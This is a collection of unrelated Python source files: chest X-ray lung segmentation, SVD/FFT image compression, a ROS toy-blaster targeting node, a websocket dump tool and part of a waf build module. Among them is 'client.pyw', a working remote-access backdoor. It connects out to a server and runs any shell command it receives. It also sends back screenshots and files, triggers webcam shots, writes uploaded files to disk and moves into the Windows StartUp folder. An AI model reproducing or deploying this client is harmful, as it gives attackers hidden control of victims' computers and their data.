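#     lung, lung_squared = single_img_crop(X[0], resized_raw[0], raw_images[0],
#                                          files[0], UNet, None, debugging=True)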
def lungseg_fromdata(X, resized_raw, raw_images, file_paths, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None ,debugging = False):
# tf.debugging.set_log_device_placement(True)
# print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# with tf.device('/GPU:0'):
n_test = X.shape[0]
inp_shape = X[0].shape
UNet = load_model(UNet, compile=False)
print('n_test = {}'.format(n_test))
# For inference standard keras ImageGenerator can be used.
test_gen = ImageDataGenerator(rescale=1.)
i = 0
for xx in test_gen.flow(X, batch_size=1, shuffle=False):
single_img_crop(
img = xx,
resized_raw_img = resized_raw[i],
raw_img = raw_images[i],
file_path = file_paths[i],
UNet = UNet,
result_folder = result_folder,
im_shape = im_shape,
cut_thresh = cut_thresh,
out_pad_size = out_pad_size,
debug_folder = debug_folder,
debugging = debugging
)
i += 1
if i == n_test:
break
print('Thread done')
def gen_idx(length, k_fold):
idxs = np.array([length // k_fold] * k_fold)
idxs[:length % k_fold] = idxs[:length % k_fold] + 1
start_points = np.cumsum(idxs)
start_points = [0] + list(start_points)
return start_points
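# Worked example: gen_idx(10, 3) -> [0, 4, 7, 10], i.e. the 10 % 3 = 1 leftover
# item goes to the first chunk, giving slices [0:4], [4:7] and [7:10].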
def adjust_process_num(length):
if length < 20:
k_fold = 1
elif length < 100:
k_fold = 4
elif length < 400:
k_fold = 8
elif length < 1000:
k_fold = 16
else:
k_fold = 24
return k_fold
def lungseg_one_process(result_folder, UNet, filenames,
im_shape = (256, 256), debug_folder = None, cut_thresh = 0.02, out_pad_size = 8, debug = False):
X, resized_raw, raw_images = load_CXR_from_list(filenames, im_shape)
print('X shape = ', X.shape)
lungseg_fromdata(X, resized_raw, raw_images, filenames, UNet, result_folder,
im_shape = im_shape, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug_folder = debug_folder, debugging = debug)
def singlefolder_lungseg(data_path, result_folder, UNet, debug_folder = None, k_fold = None, cut_thresh = 0.02, out_pad_size = 8, debug = False, filenames = None):
'''
Crop out the lung area from CXR\n
lung prediction based on UNet: https://github.com/imlab-uiip/lung-segmentation-2d
Parameters
----------
data_path : preferably pathlib object
all images in that path will be loaded for lung segmentation if filenames not specified.
result_folder : preferably pathlib object
path to output
UNet: preferably pathlib object
path to UNet
debug_folder : preferably pathlib object
path to debug images; if not specified, no debug images will be written to local
k_fold: int
Specify how many processes to create to finish this task.
If None, processes are created based on adjust_process_num function
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
filenames: list
If specified, load these images instead of loading all images in data_path.
Absolute paths needed.
'''
data_path = pathlib.Path(data_path)
result_folder = pathlib.Path(result_folder)
result_folder.mkdir(parents=True, exist_ok=True)
if debug_folder is not None:
debug_folder = pathlib.Path(debug_folder)
debug_folder.mkdir(parents=True, exist_ok=True)
im_shape = (256, 256)
chunknum = 0
chunksize = 500
print('processing data in ' + str(data_path))
if filenames is None:
filenames = list(data_path.glob('*'))
totalfiles = len(filenames)
while chunknum * chunksize < totalfiles:
start = chunknum * chunksize
end = min(totalfiles, (chunknum + 1) * chunksize)
print('segmenting {} files of folder {}'.format((start, end), str(data_path)))
curfiles = filenames[start : end]
if debug:
lungseg_one_process(result_folder, UNet, curfiles,
im_shape = im_shape, debug_folder = debug_folder, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug = debug)
return
start_time = time.time()
keywords = {
'im_shape' : im_shape,
'cut_thresh' : cut_thresh,
'out_pad_size' : out_pad_size,
'debug_folder' : debug_folder,
'debug' : debug
}
if k_fold is None:
k_fold = adjust_process_num(len(curfiles))
print('Running using {} process'.format(k_fold))
start_idxs = gen_idx(len(curfiles), k_fold)
pool = []
for k in range(k_fold):
# note: gen_idx pads the first (length % k_fold) chunks by one element,
# so the slices below cover every file in curfiles with no remainder
arg_str = (
result_folder,
UNet,
curfiles[start_idxs[k]: start_idxs[k + 1]]
)
p = multiprocessing.Process(target = lungseg_one_process, args = arg_str, kwargs = keywords)
p.start()
pool.append(p)
for p in pool:
p.join()
print('{} processes takes {} seconds'.format(k_fold, time.time() - start_time))
chunknum = chunknum + 1
def genlist(data_path_list, list_dict):
cur_dict = list_dict
for i in range(len(data_path_list)):
if i > 0:
cur_dict = cur_dict[data_path_list[i]]
# print(cur_dict)
if type(cur_dict) == list:
return cur_dict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', type=str, help = 'the directory of the image folder')
parser.add_argument('-U', '--Unet', type = str, help = 'the directory of the saved Unet weights')
parser.add_argument('-o', '--output', type = str, help = 'the directory of the resized image')
args = parser.parse_args()
UNet_path = args.Unet
folder_path = os.path.normpath(args.folder)
output_path = os.path.normpath(args.output)
if not os.path.isdir(folder_path):
containing_folder = os.path.dirname(folder_path)
singlefolder_lungseg(containing_folder, output_path, UNet_path, out_pad_size=8, debug=False, filenames=[pathlib.Path(folder_path)])
else:
singlefolder_lungseg(folder_path, output_path, UNet_path, out_pad_size=8, debug=False)
print('Completed!')
# # single image lung segmentation
# from keras.models import load_model
# parent_path = pathlib.Path(__file__).absolute().parent
# data_path = parent_path.parent.joinpath('NMHFiles_sample', 'Negative')
# img_path = data_path.joinpath('8356_47cfe01e37c2237dd6a31b424473c89f_AP_2.png')
# UNet = load_model(UNet_path)
# im_shape = (256, 256)
# X, resized_raw, raw_images = load_CXR_from_list([img_path], im_shape)
# result_folder = parent_path.parent.joinpath('NMHFiles_sample_crop', 'Negative')
# single_img_crop(X[0], resized_raw[0], raw_images[0], img_path, UNet, result_folder, debugging = True)
# print('Total time = {}'.format(time.time() - start))
|
imgc.py
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from math import log10, sqrt
from matplotlib.image import imread
import os
from skimage import metrics
import cv2
import sys
import itertools
import threading
import time
filename = sys.argv[-1]
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rCompressing ' + c)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
def PSNR(original, compressed):
mse = np.mean((original - compressed) ** 2)
if(mse == 0): # MSE is zero means no noise is present in the signal .
# Therefore PSNR have no importance.
return 100
max_pixel = 255.0
psnr = 20 * log10(max_pixel / sqrt(mse))
return psnr
#plt.rcParams['figure.figsize'] = [10, 10]
#plt.rcParams.update({'font.size': 10})
image = np.array(Image.open(filename))
image = image / 255
row, col, _ = image.shape
image_red = image[:, :, 0]
image_green = image[:, :, 1]
image_blue = image[:, :, 2]
U_r, d_r, V_r = np.linalg.svd(image_red, full_matrices=True)
U_g, d_g, V_g = np.linalg.svd(image_green, full_matrices=True)
U_b, d_b, V_b = np.linalg.svd(image_blue, full_matrices=True)
#Parameters
k = 190
keep = 0.5
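# k truncates each colour channel's SVD to a rank-k approximation; keep retains
# the largest `keep` fraction of FFT coefficients (by magnitude) of that
# approximation before the inverse transform reconstructs the channel.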
U_r_k = U_r[:, 0:k]
V_r_k = V_r[0:k, :]
U_g_k = U_g[:, 0:k]
V_g_k = V_g[0:k, :]
U_b_k = U_b[:, 0:k]
V_b_k = V_b[0:k, :]
d_r_k = d_r[0:k]
d_g_k = d_g[0:k]
d_b_k = d_b[0:k]
image_red_a = np.dot(U_r_k, np.dot(np.diag(d_r_k), V_r_k))
image_green_a = np.dot(U_g_k, np.dot(np.diag(d_g_k), V_g_k))
image_blue_a = np.dot(U_b_k, np.dot(np.diag(d_b_k), V_b_k))
rt = np.fft.fft2(image_red_a)
rtsort = np.sort(np.abs(rt.reshape(-1))) # sort by magnitude
gt=np.fft.fft2(image_green_a)
gtsort=np.sort(np.abs(gt.reshape(-1)))
bt=np.fft.fft2(image_blue_a)
btsort=np.sort(np.abs(bt.reshape(-1)))
threshr = rtsort[int(np.floor((1-keep)*len(rtsort)))]
indr = np.abs(rt)>threshr
rtlow = rt * indr
rlow = np.fft.ifft2(rtlow).real
threshg = gtsort[int(np.floor((1-keep)*len(gtsort)))]
indg = np.abs(gt)>threshg
gtlow = gt * indg
glow = np.fft.ifft2(gtlow).real
threshb = btsort[int(np.floor((1-keep)*len(btsort)))]
indb = np.abs(bt)>threshb
btlow = bt * indb
blow = np.fft.ifft2(btlow).real
image_reconstructed = np.zeros((row, col, 3))
image_reconstructed[:, :, 0] = rlow
image_reconstructed[:, :, 1] = glow
image_reconstructed[:, :, 2] = blow
name=filename.split(".")
fig = plt.figure(figsize=(5,4))
imgplot = plt.imshow(image_reconstructed)
plt.axis('off')
plt.tight_layout()
plt.savefig(name[0]+"_compressed."+name[-1])
value = PSNR(image, image_reconstructed)
s = metrics.structural_similarity(image, image_reconstructed,multichannel=True)
done = True
print("\n")
print("Image Compressed!!!")
print("PSNR value : ","%.2f" % value,"dB")
print("SSIM ratio : ","%.2f" % s)
|
client.pyw
|
import sys
import socket
from time import sleep
import webbrowser
import os
from threading import Thread
import subprocess
import getpass
try:
from PIL import ImageGrab
except ImportError:
pass
class Client:
def __init__(self, server_ip=None, port=None, name="pc"):
self.name = name
self.server_ip = server_ip
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data_path = "data.txt"
self.system = sys.platform
if server_ip is None and port is None:
self.check_file()
def check_file(self):
if os.path.exists(self.data_path) and os.path.isfile(self.data_path):
with open(self.data_path, "r") as f:
data = f.read()
self.name, self.server_ip, self.port = data.split("-")
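# run() below implements a simple command protocol with the server:
# "check", "get name", "path mode", "startup path", "cd <dir>", "dir",
# "web <url>", "screenshot", "webcam", "read <file>", "send <file>",
# "start <file>", "close"/"reset"; anything else is executed in a shell and its
# output sent back, terminated by the literal marker "end".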
def run(self):
while True:
try:
sleep(1)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.server_ip, int(self.port)))
self.s.send(self.name.encode("UTF-8"))
break
except Exception:
continue
while True:
try:
command = self.s.recv(1024).decode("UTF-8")
if command == "check":
self.s.send("connection established".encode("UTF-8"))
elif command == "get name":
self.s.send(self.name.encode("UTF-8"))
elif command == "path mode":
path = os.getcwd().encode("utf-8")
self.s.send(path)
elif command == "startup path":
username = getpass.getuser()
startup_path = "C:/Users/{}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/StartUp".format(username)
if os.path.exists(startup_path):
os.chdir(startup_path)
self.s.send(os.getcwd().encode("UTF-8"))
else:
self.s.send(os.getcwd().encode("UTF-8"))
elif command.startswith("cd "):
try:
os.chdir(command[3:])
self.s.send(os.getcwd().encode("UTF-8"))
except OSError:
self.s.send(os.getcwd().encode("UTF-8"))
elif command.startswith("dir"):
self.send_output(command)
elif command.startswith("web "):
webbrowser.open(command[4:])
elif command == "screenshot":
if "linux" not in self.system:
screenshot_name = "screenshot.jpg"
ImageGrab.grab().save(screenshot_name)
with open(screenshot_name, "rb") as f:
data = f.read()
self.s.send(data)
self.s.send("end".encode("utf-8"))
os.remove(screenshot_name)
else:
self.s.send("error".encode("utf-8"))
elif command == "webcam":
if os.path.exists("webcam_shot.pyw"):
#os.system("start webcam_shot.pyw")
os.startfile("webcam_shot.pyw")
self.s.send("Taking webcam shot.".encode("utf-8"))
else:
self.s.send("File to take webcam shots doesn't exist.".encode("utf-8"))
elif command.startswith("read "):
file = command.split()[1]
if os.path.exists(file) and os.path.isfile(file):
self.s.send("ok".encode("utf-8"))
with open(file, "rb") as f:
data = f.read()
self.s.send(data)
self.s.send("end".encode("utf-8"))
else:
self.s.send("error".encode("utf-8"))
elif command.startswith("send "):
file_name = command.split()[1]
file_data = b""
while True:
data = self.s.recv(1024)
file_data += data
if data.endswith(b"end"):
break
with open(file_name, "wb") as f:
f.write(file_data[:len(file_data) - 3])
self.s.send("File has been written.".encode("utf-8"))
elif command.startswith("start "):
file = command.split()[1]
if os.path.exists(file) and len(file) > 0:
os.startfile(file)
self.s.send("File has been opened.".encode("utf-8"))
else:
self.s.send("File doesn't exist.".encode("utf-8"))
elif command == "close" or command == "reset":
self.s.close()
break
else:
self.send_output(command)
except Exception:
break
sleep(1)
Thread(target=self.run).start()
def send_output(self, command):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = process.stdout.read() + process.stderr.read()
self.s.send(output)
self.s.send("end".encode("utf-8"))
if __name__ == '__main__':
name = ""
ip = ""
port = 6000
client = Client(ip, port, name)
client.run()
|
deepblaster_targeting_node.py
|
#################################################################################
# Copyright Cloud Brigade, ScratchSpace, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
deepblaster_targeting_node.py
This module decides the action messages (servo control messages, and blaster control messages)
to be sent out using the detection deltas from object_detection_node.
The node defines:
detection_delta_subscriber: A subscriber to the /object_detection_pkg/object_detection_delta
published by the deepblaster_object_detection_pkg with the normalized delta
of the detected object position from the target (reference) position
with respect to x and y axes.
action_publisher: A publisher to publish the actions (servo angles and speed, blaster flywheel
spinup, and trigger values).
"""
import time
import signal
import threading
import math
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from deepblaster_interfaces_pkg.msg import (BlasterCtrlMsg,
DetectionDeltaMsg)
from deepblaster_targeting_pkg import (constants,
utils)
class DBTargetingNode(Node):
"""Node responsible for deciding the action messages (servo control messages specifically angle
and trigger) to be sent out using the detection deltas from object_detection_node.
"""
def __init__(self, qos_profile):
"""Create a DBTargetingNode.
"""
super().__init__('deepblaster_targeting_node')
self.get_logger().info("deepblaster_targeting_node started.")
# Double buffer to hold the input deltas in x and y from Object Detection.
self.delta_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Create subscription to detection deltas from object_detection_node.
self.detection_delta_subscriber = \
self.create_subscription(DetectionDeltaMsg,
constants.OBJECT_DETECTION_DELTA_TOPIC,
self.detection_delta_cb,
qos_profile)
# Creating publisher to publish action (angle and trigger).
self.action_publisher = self.create_publisher(BlasterCtrlMsg,
constants.ACTION_PUBLISH_TOPIC,
qos_profile)
# Initializing the msg to be published.
msg = BlasterCtrlMsg()
msg.x_angle = constants.ActionValues.XDEFAULT
msg.y_angle = constants.ActionValues.YDEFAULT
msg.flywheel = constants.ActionValues.SAFE
msg.trigger = constants.ActionValues.SAFE
self.lock = threading.Lock()
# Create a background servo publish thread.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.action_publish, args=(msg,))
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input delta: {constants.OBJECT_DETECTION_DELTA_TOPIC}")
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def detection_delta_cb(self, detection_delta):
"""Call back for whenever detection delta for a perception
is received from object_detection_node.
Args:
detection_delta (DetectionDeltaMsg): Message containing the normalized detection
delta in x and y axes respectively passed as
a list.
"""
self.delta_buffer.put(detection_delta)
def plan_action(self, delta):
"""Helper method to calculate action to be undertaken from the detection delta
received from object_detection_node.
Args:
delta (list of floats): detection deltas in x and y axes respectively.
Returns:
(int): Action Space Category defined in constants.py
"""
delta_x = delta[0]
delta_y = delta[1]
# Delta_Y could be used to determine when we are close enough to fire blaster
# if delta_y < constants.DeltaValueMap.FIRE_DELTA_Y:
# # Fire!
# return constants.ACTION_SPACE[7][constants.ActionSpaceKeys.CATEGORY]
# elif delta_y >= constants.DeltaValueMap.FIRE_DELTA_Y:
# Forward Bracket
if delta_x < constants.DeltaValueMap.SHORT_LEFT_DELTA_X \
and delta_x > constants.DeltaValueMap.MID_LEFT_DELTA_X:
# Short Left
return constants.ACTION_SPACE[2][constants.ActionSpaceKeys.CATEGORY]
elif delta_x < constants.DeltaValueMap.MID_LEFT_DELTA_X \
and delta_x > constants.DeltaValueMap.FAR_LEFT_DELTA_X:
# Mid Left
return constants.ACTION_SPACE[3][constants.ActionSpaceKeys.CATEGORY]
elif delta_x <= constants.DeltaValueMap.FAR_LEFT_DELTA_X:
# Far Left
return constants.ACTION_SPACE[4][constants.ActionSpaceKeys.CATEGORY]
elif delta_x > constants.DeltaValueMap.SHORT_RIGHT_DELTA_X \
and delta_x < constants.DeltaValueMap.MID_RIGHT_DELTA_X:
# Short Right
return constants.ACTION_SPACE[5][constants.ActionSpaceKeys.CATEGORY]
elif delta_x > constants.DeltaValueMap.MID_RIGHT_DELTA_X \
and delta_x < constants.DeltaValueMap.FAR_RIGHT_DELTA_X:
# Mid Right
return constants.ACTION_SPACE[6][constants.ActionSpaceKeys.CATEGORY]
elif delta_x >= constants.DeltaValueMap.FAR_RIGHT_DELTA_X:
# Far Right
return constants.ACTION_SPACE[7][constants.ActionSpaceKeys.CATEGORY]
else:
# No Action
return constants.ACTION_SPACE[1][constants.ActionSpaceKeys.CATEGORY]
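        # Illustrative walk-through with hypothetical threshold values (the real numbers live in
        # constants.DeltaValueMap and are not shown in this file): if SHORT_LEFT_DELTA_X were -0.1,
        # MID_LEFT_DELTA_X were -0.3 and FAR_LEFT_DELTA_X were -0.5, then a normalized delta_x of
        # -0.2 satisfies delta_x < -0.1 and delta_x > -0.3, so plan_action would return the
        # "Short Left" category (ACTION_SPACE[2]).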
def get_mapped_action(self, action_category):
"""Return the angle and trigger values to be published for servo.
Args:
action_category (int): Integer value corresponding to the action space category.
Returns:
x_angle (float): Angle value to be published to servo.
y_angle (float): Angle value to be published to servo.
flywheel (int): Trigger value to be published to relay.
trigger (int): Trigger value to be published to relay.
"""
action = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.ACTION]
self.get_logger().info(action)
x_angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.XANGLE]
y_angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.YANGLE]
#if object is detected, we should spinup flywheels in preparation for firing
flywheel = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.FLYWHEEL]
#else
flywheel = constants.ActionValues.SAFE
# if object detection x_delta is near zero, and flywheels are spinning, fire!
trigger = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.FLYWHEEL]
# else
# trigger = constants.ActionValues.SAFE
return x_angle, y_angle, flywheel, trigger
def action_publish(self, msg):
"""Function which runs in a separate thread to read object detection delta
from double buffer, decides the action and sends it to Blaster Control node.
Args:
msg: detection_delta (DetectionDeltaMsg): Message containing the normalized
detection delta in x and y axes respectively passed as a list.
"""
try:
while not self.stop_thread:
# Get a new message to plan action on
detection_delta = self.delta_buffer.get()
action_category = self.plan_action(detection_delta.delta)
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = self.get_mapped_action(action_category)
# Publish msg based on action planned and mapped from a new object detection.
self.action_publisher.publish(msg)
# Sleep for a default amount of time before checking if new data is available.
time.sleep(constants.DEFAULT_SLEEP)
# If new data is not available within default time, gracefully run blind.
while self.delta_buffer.is_empty() and not self.stop_thread:
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = self.get_mapped_action(action_category)
# @TODO Return x_angle value to 90 degrees
# msg.x_angle = msg.x_angle / 2
# Publish blind action
self.action_publisher.publish(msg)
# Sleep before checking if new data is available.
time.sleep(0.1)
except Exception as ex:
self.get_logger().error(f"Failed to publish action to blaster control topic: {ex}")
            # Return the blaster to a safe default state (default angles, flywheel and trigger SAFE)
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = constants.ActionValues.XDEFAULT, constants.ActionValues.YDEFAULT, constants.ActionValues.SAFE, constants.ActionValues.SAFE
self.action_publisher.publish(msg)
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
try:
deepblaster_targeting_node = DBTargetingNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number.
frame: the current stack frame (None or a frame object).
"""
deepblaster_targeting_node.get_logger().info("Signal Handler initiated")
deepblaster_targeting_node.thread_shutdown()
deepblaster_targeting_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(deepblaster_targeting_node, executor)
except Exception as ex:
deepblaster_targeting_node.get_logger().error(f"Exception in DBTargetingNode: {ex}")
deepblaster_targeting_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
deepblaster_targeting_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
wsdump.py
|
#!C:\Users\rexli\Desktop\Commonly Used\StockTradingBot\venv\Scripts\python.exe
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
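# Illustrative invocations assembled from the argparse options defined above (the echo URL is
# the example given in the help text, not a guaranteed live endpoint):
#
#   python wsdump.py ws://echo.websocket.org/ -t "hello" --timings
#   python wsdump.py wss://example.org/socket -n -v -p http://127.0.0.1:8080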
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magic number
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
preforkunix.py
|
#! /usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2015 (ita)
"""
A version of prefork.py that uses unix sockets. The advantage is that it does not expose
connections to the outside. However, it only works on unix-like systems
and performance can be slightly worse.
To use::
def options(opt):
# recommended, fork new processes before using more memory
opt.load('preforkunix')
def build(bld):
bld.load('preforkunix')
...
more code
"""
import os, re, socket, threading, sys, subprocess, atexit, traceback, signal, time
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
import cPickle
except ImportError:
import pickle as cPickle
HEADER_SIZE = 20
REQ = 'REQ'
RES = 'RES'
BYE = 'BYE'
def make_header(params, cookie=''):
header = ','.join(params)
header = header.ljust(HEADER_SIZE - len(cookie))
assert(len(header) == HEADER_SIZE - len(cookie))
header = header + cookie
if sys.hexversion > 0x3000000:
header = header.encode('iso8859-1')
return header
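# Illustrative example (not part of the waf API): make_header([REQ, '123']) builds the
# comma-separated string 'REQ,123', left-justifies it with spaces to HEADER_SIZE (20)
# characters, and on Python 3 returns it encoded as iso8859-1 bytes; a non-empty cookie
# would occupy the tail of the same fixed-size slot.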
re_valid_query = re.compile('^[a-zA-Z0-9_, ]+$')
if 1:
def send_response(conn, ret, out, err, exc):
if out or err or exc:
data = (out, err, exc)
data = cPickle.dumps(data, -1)
else:
data = ''
params = [RES, str(ret), str(len(data))]
# no need for the cookie in the response
conn.send(make_header(params))
if data:
conn.send(data)
def process_command(conn):
query = conn.recv(HEADER_SIZE)
if not query:
return None
#print(len(query))
assert(len(query) == HEADER_SIZE)
if sys.hexversion > 0x3000000:
query = query.decode('iso8859-1')
#print "%r" % query
if not re_valid_query.match(query):
send_response(conn, -1, '', '', 'Invalid query %r' % query)
raise ValueError('Invalid query %r' % query)
query = query.strip().split(',')
if query[0] == REQ:
run_command(conn, query[1:])
elif query[0] == BYE:
raise ValueError('Exit')
else:
raise ValueError('Invalid query %r' % query)
return 'ok'
def run_command(conn, query):
size = int(query[0])
data = conn.recv(size)
assert(len(data) == size)
kw = cPickle.loads(data)
# run command
ret = out = err = exc = None
cmd = kw['cmd']
del kw['cmd']
#print(cmd)
try:
if kw['stdout'] or kw['stderr']:
p = subprocess.Popen(cmd, **kw)
(out, err) = p.communicate()
ret = p.returncode
else:
ret = subprocess.Popen(cmd, **kw).wait()
except KeyboardInterrupt:
raise
except Exception as e:
ret = -1
exc = str(e) + traceback.format_exc()
send_response(conn, ret, out, err, exc)
if 1:
from waflib import Logs, Utils, Runner, Errors, Options
def init_task_pool(self):
# lazy creation, and set a common pool for all task consumers
pool = self.pool = []
for i in range(self.numjobs):
consumer = Runner.get_pool()
pool.append(consumer)
consumer.idx = i
self.ready = Queue(0)
def setq(consumer):
consumer.ready = self.ready
try:
threading.current_thread().idx = consumer.idx
except Exception as e:
print(e)
for x in pool:
x.ready.put(setq)
return pool
Runner.Parallel.init_task_pool = init_task_pool
def make_conn(bld):
child_socket, parent_socket = socket.socketpair(socket.AF_UNIX)
ppid = os.getpid()
pid = os.fork()
if pid == 0:
parent_socket.close()
# if the parent crashes, try to exit cleanly
def reap():
while 1:
try:
os.kill(ppid, 0)
except OSError:
break
else:
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = threading.Thread(target=reap)
t.setDaemon(True)
t.start()
# write to child_socket only
try:
while process_command(child_socket):
pass
except KeyboardInterrupt:
sys.exit(2)
else:
child_socket.close()
return (pid, parent_socket)
SERVERS = []
CONNS = []
def close_all():
		global SERVERS, CONNS
while CONNS:
conn = CONNS.pop()
try:
conn.close()
except:
pass
while SERVERS:
pid = SERVERS.pop()
try:
os.kill(pid, 9)
except:
